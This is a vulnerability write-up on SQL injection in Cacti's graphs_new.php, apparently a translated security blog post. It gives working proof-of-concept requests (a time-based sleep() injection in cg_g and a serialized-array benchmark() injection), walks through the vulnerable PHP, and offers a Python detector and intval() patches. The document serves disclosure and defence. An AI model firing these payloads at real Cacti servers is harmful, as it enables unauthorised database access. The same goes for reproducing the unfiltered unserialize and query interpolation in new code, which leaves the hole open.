Cacti /graphs_new.php SQL Injection Vulnerability
Contents
1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Mitigation
6. Attack and defense reflections
1. Vulnerability description
Another SQL injection vulnerability via graphs_new.php in Cacti was found and reported as bug http://bugs.cacti.net/view.php?id=2652
Relevant Link:
http://bobao.360.cn/snapshot/index?id=146936
2. Trigger conditions
0x1: POC1: SQL Injection
POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
0x2: POC2: Object Injection
1. Log in.
2. POST http://target/cacti/graphs_new.php
   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
   {Injection exp can be found on my server: http://pandas.pw/cacti.exp}
3. MySQL log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--
3. Affected scope
4. Vulnerable code analysis
0x1: Vuls-1: Object Injection To SQL Injection
/graphs_new.php
/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
    case 'save':
        // track function form_save
        form_save();
        break;
    case 'query_reload':
        host_reload_query();
        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
        break;
    default:
        include_once("./include/top_header.php");
        graphs();
        include_once("./include/bottom_footer.php");
        break;
}
form_save();
function form_save() {
    ...
    if (isset($_POST["save_component_new_graphs"])) {
        // track function host_new_graphs_save()
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}
host_new_graphs_save();
function host_new_graphs_save() {
    // $selected_graphs_array is simply the unserialized POST variable, which we control and which is not filtered.
    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    ...
    // The variable then feeds a three-dimensional array, and finally the tainted data we control reaches the select query, causing a SQL injection.
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ...
}
0x2: Vuls-2: SQL Injection
function form_save() {
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            }
            // cg_g is not filtered: only "> 0" is checked, which a string such as "033926697 xor ..." passes
            elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }
        if (isset($selected_graphs)) {
            // externally supplied parameters are passed into host_new_graphs
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();
    include_once("./include/top_header.php");
    print "\n";
    $snmp_query_id = 0;
    $num_output_fields = array();
    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // sql injection in graph_template_id: the array key comes straight from cg_g
                $graph_template_id = $form_id1;
                html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
Relevant Link:
http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652
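A request-side check derived from the two code paths above, added here as an example rather than code from the advisory or from Cacti: it applies the integer and `sg_(\d+)_([a-f0-9]{32})` shapes that form_save() itself expects to a graphs_new.php POST body, and walks the `s:N:"..."` scalars of a serialized selected_graphs_array, so a WAF hook or a log-replay script can flag the two payload positions. The function name, the POC2-style serialized body and the 32-hex index value are constructed for this example; POC1's body is the one quoted in section 2.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Parameters that reach SQL as bare ids in graphs_new.php; cg_g is only tested with "> 0".
INT = re.compile(r"^\d+$")
# String scalars that legitimately occur inside a serialized selected_graphs_array:
# the "cg"/"sg" group names and the 32-hex snmp-index hashes from sg_(\d+)_([a-f0-9]{32}).
ALLOWED_STR = re.compile(r"^(cg|sg|[a-f0-9]{32})$")
SER_STR_HEAD = re.compile(r's:(\d+):"')

def serialized_strings(blob: str) -> list:
    """Pull every s:N:"..." scalar out of a PHP serialize() blob (ASCII payloads assumed)."""
    out, pos = [], 0
    while (m := SER_STR_HEAD.search(blob, pos)):
        start, n = m.end(), int(m.group(1))
        out.append(blob[start:start + n])
        pos = start + n
    return out

def check_graphs_new_post(body: str) -> list:
    """Return findings for one graphs_new.php POST body; an empty list means it looks clean."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in ("cg_g", "host_id", "host_template_id"):
            if not INT.match(value):
                findings.append(f"{name}: non-integer value {value!r}")
        elif name == "selected_graphs_array":
            # host_new_graphs_save() unserialize()s this and uses the array keys as SQL ids
            for s in serialized_strings(value):
                if not ALLOWED_STR.match(s):
                    findings.append(f"selected_graphs_array: unexpected string {s!r}")
    return findings

# POC1 body as given in section 2 (cg_g carries the time-based payload).
POC1_BODY = ("__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184"
             "&cg_g=033926697+xor+(select(0)from(select sleep(5))v)"
             "&save_component_graph=1&host_id=2&host_template_id=0&action=save")
# Constructed POC2-style body: the snmp_query_graph_id key inside the serialized
# array carries the benchmark() payload seen in the advisory's MySQL log.
POC2_BODY = urlencode({
    "action": "save", "save_component_new_graphs": "1", "host_id": "1",
    "selected_graphs_array": 'a:1:{s:2:"sg";a:1:{i:1;a:1:{s:35:"1 and benchmark(20000000,sha1(1))--";'
                             'a:1:{s:32:"0123456789abcdef0123456789abcdef";b:1;}}}}',
})
# Constructed benign body: what the real "create graph" form submits for template id 5.
BENIGN_BODY = "__csrf_magic=sid%3Aplaceholder%2C1&cg_g=5&save_component_graph=1&host_id=2&host_template_id=0&action=save"

if __name__ == "__main__":
    for label, body in (("POC1", POC1_BODY), ("POC2", POC2_BODY), ("benign", BENIGN_BODY)):
        print(label, check_graphs_new_post(body) or "clean")
```

The same check, with intval() applied server-side as in section 5, is what actually closes the hole; this script only helps you see the attempts in captured traffic.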
5. Mitigation
/graphs_new.php
function host_new_graphs_save() {
    ...
    /* before: $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); */
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ...
}
/graphs_new.php
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();
    include_once("./include/top_header.php");
    print "\n";
    $snmp_query_id = 0;
    $num_output_fields = array();
    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                $graph_template_id = $form_id1;
                $graph_template_id = intval($graph_template_id); // added: force an integer before it is interpolated into the query
                html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
Relevant Link:
http://www.cacti.net/download_cacti.php
6. Attack and defense reflections
Copyright (c) 2016 Little5ann All rights reserved